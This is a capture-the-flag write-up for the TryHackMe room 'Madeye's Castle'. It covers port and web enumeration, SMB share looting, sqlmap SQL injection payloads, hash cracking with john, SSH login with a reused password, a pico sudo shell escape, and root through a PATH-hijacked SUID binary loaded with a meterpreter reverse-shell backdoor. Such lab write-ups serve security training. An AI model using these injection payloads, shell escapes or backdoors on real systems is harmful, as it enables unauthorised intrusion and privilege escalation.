Table of Contents
- URL: https://tryhackme.com/room/madeyescastle
- Target OS: Linux
- Rated Difficulty: Medium
DESCRIPTION
Have fun storming Madeye’s Castle! In this room you will need to fully enumerate the system, gain a foothold, and then pivot around to a few different users.
ENUM >> NMAP
root@ip-10-10-188-149:~# nmap -sS -sV -oN madeye_init 10.10.136.197
Starting Nmap 7.60 ( https://nmap.org ) at 2021-12-12 05:27 GMT
Nmap scan report for ip-10-10-136-197.eu-west-1.compute.internal (10.10.136.197)
Host is up (0.013s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:C4:11:EB:67:87 (Unknown)
Service Info: Host: HOGWARTZ-CASTLE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.52 seconds
ENUM >> FeroxBuster (common.txt)
❯ feroxbuster -u http://10.10.136.197/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.4.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.136.197/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.4.0
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 9l 28w 278c http://10.10.136.197/.hta
403 9l 28w 278c http://10.10.136.197/.htaccess
403 9l 28w 278c http://10.10.136.197/.htpasswd
301 9l 28w 315c http://10.10.136.197/backup
403 9l 28w 278c http://10.10.136.197/backup/.hta
403 9l 28w 278c http://10.10.136.197/backup/.htaccess
403 9l 28w 278c http://10.10.136.197/backup/.htpasswd
200 375l 969w 10965c http://10.10.136.197/index.html
200 43l 258w 1527c http://10.10.136.197/backup/email
403 9l 28w 278c http://10.10.136.197/server-status
[####################] - 33s 9404/9404 0s found:10 errors:0
[####################] - 28s 4702/4702 167/s http://10.10.136.197/
[####################] - 27s 4702/4702 172/s http://10.10.136.197/backup
ENUM >> /backup/email
- This looks to be a big hint pointing towards vhosts… we also see
HOGWARTZ-CASTLE
mentioned in the NMAP scan…
Madeye,
It is done. I registered the name you requested below but changed the "s" to a "z". You should be good to go.
RME
--------
On Tue, Nov 24, 2020 at 8:54 AM Madeye Moody <ctf@madeye.ninja> wrote:
Mr. Roar M. Echo,
Sounds great! Thanks, your mentorship is exactly what we need to avoid legal troubles with the Ministry of Magic.
Magically Yours,
madeye
--------
On Tue, Nov 24, 2020 at 8:53 AM Roar May Echo <info@roarmayecho.com> wrote:
Madeye,
I don't think we can do "hogwarts" due to copyright issues, but let's go with "hogwartz", how does that sound?
Roar
--------
On Tue, Nov 24, 2020 at 8:52 AM Madeye Moody <ctf@madeye.ninja> wrote:
Dear Mr. Echo,
Thanks so much for helping me develop my castle for TryHackMe. I think it would be great to register the domain name of "hogwarts-castle.thm" for the box. I have been reading about virtual hosting in Apache and it's a great way to host multiple domains on the same server. The docs says that...
> The term Virtual Host refers to the practice of running more than one web site (such as
> company1.example.com and company2.example.com) on a single machine. Virtual hosts can be
> "IP-based", meaning that you have a different IP address for every web site, or "name-based",
> meaning that you have multiple names running on each IP address. The fact that they are
> running on the same physical server is not apparent to the end user.
You can read more here: https://httpd.apache.org/docs/2.4/vhosts/index.html
What do you think?
Thanks,
madeye
- Sure enough! Setting up our
/etc/hosts
to point the target IP tohogwartz-castle.thm
reveals a login page when we visit the URL: http://hogwartz-castle.thm
ENUM >> samba
- Running
enum4linux
we get a few tidbits of information:
[+] Attempting to map shares on hogwartz-castle.thm
//hogwartz-castle.thm/sambashare Mapping: OK Listing: OK Writing: N/A
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\harry (Local User)
S-1-22-1-1002 Unix User\hermonine (Local User)
- First things first, let’s check out that share:
❯ smbclient \\\\10.10.136.197\\sambashare
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\stimpz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 12:19:20 2020
.. D 0 Thu Nov 26 11:57:55 2020
spellnames.txt N 874 Thu Nov 26 12:06:32 2020
.notes.txt H 147 Thu Nov 26 12:19:19 2020
9219412 blocks of size 1024. 4394760 blocks available
smb: \> get spellnames.txt
getting file \spellnames.txt of size 874 as spellnames.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> get .notes.txt
getting file \.notes.txt of size 147 as .notes.txt (0.1 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
LOOT >> .notes.txt
Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.
ENUM >> SQLi!
While waiting for Hydra to brute-force the login form (dead-end) I tried a quick SQL injection on the user
field of the login page… this is the response I got!
{"error":"The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection... keep digging"}
- Time to throw
sqlmap
at the login form:
❯ sqlmap -r ~/tryhackme/ctf/madeyes_castle/requests --risk=3 --level=5 --random-agent --dump-all
___
__H__
___ ___[.]_____ ___ ___ {1.5.9#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[18:58:53] [INFO] POST parameter 'user' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=403)
[18:59:02] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
[18:59:17] [INFO] POST parameter 'user' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
---
Parameter: user (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: user=-1478' OR 7741=7741-- QefG&password=password
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: user=harry' OR 1584=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- RCQw&password=password
---
[19:00:23] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: SQLite
[19:34:08] [INFO] retrieving the length of query output
[19:34:08] [INFO] retrieved: 1
[19:34:10] [INFO] retrieved: 0
[19:34:13] [INFO] retrieving the length of query output
[19:34:13] [INFO] retrieved: 12
[19:34:23] [INFO] retrieved: Harry Turner
[19:34:23] [INFO] retrieving the length of query output
[19:34:23] [INFO] retrieved: 60
[19:34:50] [INFO] retrieved: My linux username is my first name, and password uses best64
[19:34:50] [INFO] retrieving the length of query output
[19:34:50] [INFO] retrieved: 128
[19:35:47] [INFO] retrieved: <REDACTED>
CREDS - harry's website hash
PRIVESC >> harry’s password = SSH!
- Throwing the hash we found at
john
with that world-famous wordlistrockyou.txt
we get a hit!
❯ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA512 --rules=best64 creds.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 128/128 AVX 2x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
1g 0:00:01:54 DONE (2021-12-12 20:17) 0.008737g/s 3388Kp/s 3388Kc/s 3388KC/s yaziel123..whoabuddy123
Session completed
CREDS - harry
- Hopefully
harry
is stupid enough to use the same password on his shell account:
❯ ssh harry@hogwartz-castle.thm
harry@hogwartz-castle.thm's password:
_ __ __ __ __ __ __
| | /| / /__ / /______ __ _ ___ / /____ / // /__ ___ __ _____ _____/ /____
| |/ |/ / -_) / __/ _ \/ ' \/ -_) / __/ _ \ / _ / _ \/ _ <code>/ |/|/ / _
/ __/ __/_ /
|__/|__/\__/_/\__/\___/_/_/_/\__/ \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/ \__//__/
/___/
Last login: Thu Nov 26 01:42:18 2020
harry@hogwartz-castle:~$
PRIVESC (lateral) >> hermonine
- Let’s check out our
sudo
access since we have a password…
harry@hogwartz-castle:/home$ sudo -l
[sudo] password for harry:
Matching Defaults entries for harry on hogwartz-castle:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User harry may run the following commands on hogwartz-castle:
(hermonine) /usr/bin/pico
(hermonine) /usr/bin/pico
harry@hogwartz-castle:/home$ sudo -u hermonine /usr/bin/pico
- Good, with
pico
all we need to do is hitCtrl-R
&Ctrl-X
once it loads and we get a "Command to execute:" prompt. If we typereset; bash 1>&0 2>&0
we can break out into a shell:
hermonine@hogwartz-castle:/home$
PRIVESC >> root via SUID /srv/time-turner/swagger
- There is a binary named
swagger
installed on the box, a custom SUID binary that has 2 major flaws – it usestime
to get it’s "random" number (that you are expected to guess), and also conveniently callsuname
without a path. If we change our path to the same folder as the executable (it’s writeable), then using some command piping to beat the random number by quickly grabbing the result and re-running it to get it the correct answer (timing attack).
hermonine@hogwartz-castle:/srv/time-turner$ export PATH=/srv/time-turner:$PATH
hermonine@hogwartz-castle:/srv/time-turner$ echo '111' | /srv/time-turner/swagger | grep "of" | cut -f5 -d' ' | /srv/time-turner/swagger ;
- For the replacement of
uname
I simply slipped in a meterpreter backdoor… all the usual "quick" methods would either lose the root privileges or fail for some other weird reasons (incorrect fd descriptors?!)…
[*] Meterpreter session 1 opened (10.4.54.194:4444 -> 10.10.116.144:49146) at 2021-12-12 22:12:12 +1100
meterpreter > getuid
Server username: root
meterpreter > ls
Listing: /srv/time-turner
=========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
104755/rwxr-xr-x 8816 fil 2020-11-26 12:06:32 +1100 swagger
100775/rwxrwxr-x 250 fil 2021-12-12 22:11:45 +1100 uname
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
20666/rw-rw-rw- 0 cha 2021-12-12 18:35:51 +1100 .bash_history
100644/rw-r--r-- 3106 fil 2020-11-26 11:32:40 +1100 .bashrc
40700/rwx------ 4096 dir 2020-11-26 12:17:20 +1100 .cache
100640/rw-r----- 336 fil 2020-11-26 12:48:38 +1100 .credits.txt
40700/rwx------ 4096 dir 2020-11-26 12:17:20 +1100 .gnupg
100644/rw-r--r-- 148 fil 2020-11-26 11:32:40 +1100 .profile
40700/rwx------ 4096 dir 2020-11-26 12:44:11 +1100 .ssh
100600/rw------- 38 fil 2020-11-26 12:06:32 +1100 root.txt